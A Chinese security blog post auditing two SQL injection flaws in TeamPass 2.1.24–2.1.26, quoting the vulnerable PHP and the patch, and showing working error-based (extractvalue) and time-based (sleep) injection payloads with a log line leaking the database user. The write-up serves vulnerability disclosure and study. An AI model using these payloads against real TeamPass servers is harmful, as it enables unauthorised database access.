Braid信息安全博客 - Web安全|代码审计|安全开发|Java|php|python

【PHP代码审计】 TeamPass SQL注入漏洞(CVE request)

0x01 影响范围

TeamPass所有版本(2.1.26, 2.1.25, 2.1.24)

0x02 漏洞描述

2016年7月11日在seclists.org上披露了TeamPass全版本(2.1.26, 2.1.25, 2.1.24)存在两处SQL注入漏洞。

0x03 漏洞详情

TeamPass在github上发布了补丁:
https://github.com/nilsteampassnet/TeamPass/commit/7bf6c63c4727a6ba9d65610e59ccbc25527a6fca
根据补丁,我们可以简单分析下该漏洞:

注入一:

缺陷代码sources/items.queries.php,第2504行~2540行代码

case "send_email":
if ($_POST['key'] != $_SESSION['key']) {
echo '[{"error" : "something_wrong"}]';
break;
} else {
if (!empty($_POST['content'])) {
$content = explode(',', $_POST['content']);
}
// get links url
if (empty($_SESSION['settings']['email_server_url'])) {
$_SESSION['settings']['email_server_url'] = $_SESSION['settings']['cpassman_url'];
}
if ($_POST['cat'] == "request_access_to_author") {
$dataAuthor = DB::queryfirstrow("SELECT email,login FROM " . prefix_table("users") . " WHERE id= " . $content[1]);
$dataItem = DB::queryfirstrow("SELECT label FROM " . prefix_table("items") . " WHERE id= " . $content[0]);
$ret = @sendEmail(
$LANG['email_request_access_subject'],
str_replace(array('#tp_item_author#', '#tp_user#', '#tp_item#'), array(" " . addslashes($dataAuthor['login']), addslashes($_SESSION['login']), addslashes($dataItem['label'])), $LANG['email_request_access_mail']),
$dataAuthor['email']
);
} elseif ($_POST['cat'] == "share_this_item") {
//这里未对$_POST['id']进行单引号保护
$dataItem = DB::queryfirstrow("SELECT label,id_tree FROM " . prefix_table("items") . " WHERE id= " . $_POST['id']);

// send email
$ret = @sendEmail(
$LANG['email_share_item_subject'],
str_replace(
array('#tp_link#', '#tp_user#', '#tp_item#'),
array($_SESSION['settings']['email_server_url'] . '/index.php?page=items&group=' . $dataItem['id_tree'] . '&id=' . $_POST['id'], addslashes($_SESSION['login']), addslashes($dataItem['label'])),
$LANG['email_share_item_mail']
),
$_POST['receipt']
);
}
echo '[{' . $ret . '}]';
}
break;

查看上面缺陷代码发现参数$_POST[‘id’]在带入数据库查询之前没有单引号保护和有效的sql注入过滤,从而造成SQL注入漏洞。

注入二:

缺陷代码includes/libraries/Database/Meekrodb/db.class.php,第609~621行代码

// ----- BEGIN ERROR HANDLING
if (!$sql || $db->error) {
if ($this->error_handler) {
$db_error = $db->error;
$db_errno = $db->errno;
$db->query(
"INSERT INTO " . $GLOBALS['pre'] . "log_system SET
date=" . time() . ",
qui=" . $_SESSION['user_id'] . ",
label='Query: " . addslashes($sql) . "<br />Error: " . addslashes($db_error) . "<br />@ " . $_SERVER['REQUEST_URI'] . "',
type='error'",

MYSQLI_USE_RESULT
);

在数据库查询发生错误时会执行这个insert语句,而$_SERVER[‘REQUEST_URI’]参数未进行sql注入过滤处理,下面测试使用的PHP版本是5.5无GPC了,所以可以进行SQL注入。

0x04 漏洞证明

注入一:
这里burpsuite抓包并使用XPATH注入,可以获取当前数据库user和版本如下:

注入二:
在注入一的基础上加个延时即可再次注入如下:

burp发现等待了10秒才有回显,然后mysql日志监控发现成功执行了该insert语句

INSERT INTO teampass_log_system SET
date=1468297513,
qui=1,
label='Query: SELECT label,id_tree FROM teampass_items WHERE id= -1/**/and/**/extractvalue(1,concat(0x7e,(select concat(user()))))#<br />Error: XPATH syntax error: \'~root@localhost\'<br />@ /teampass/sources/items.queries.php?'or/**/sleep(10)/**/or'1',
type='error'

本文由HackBraid整理总结,原文链接:http://www.cnbraid.com/2016/teampass.html,如需转载请联系作者。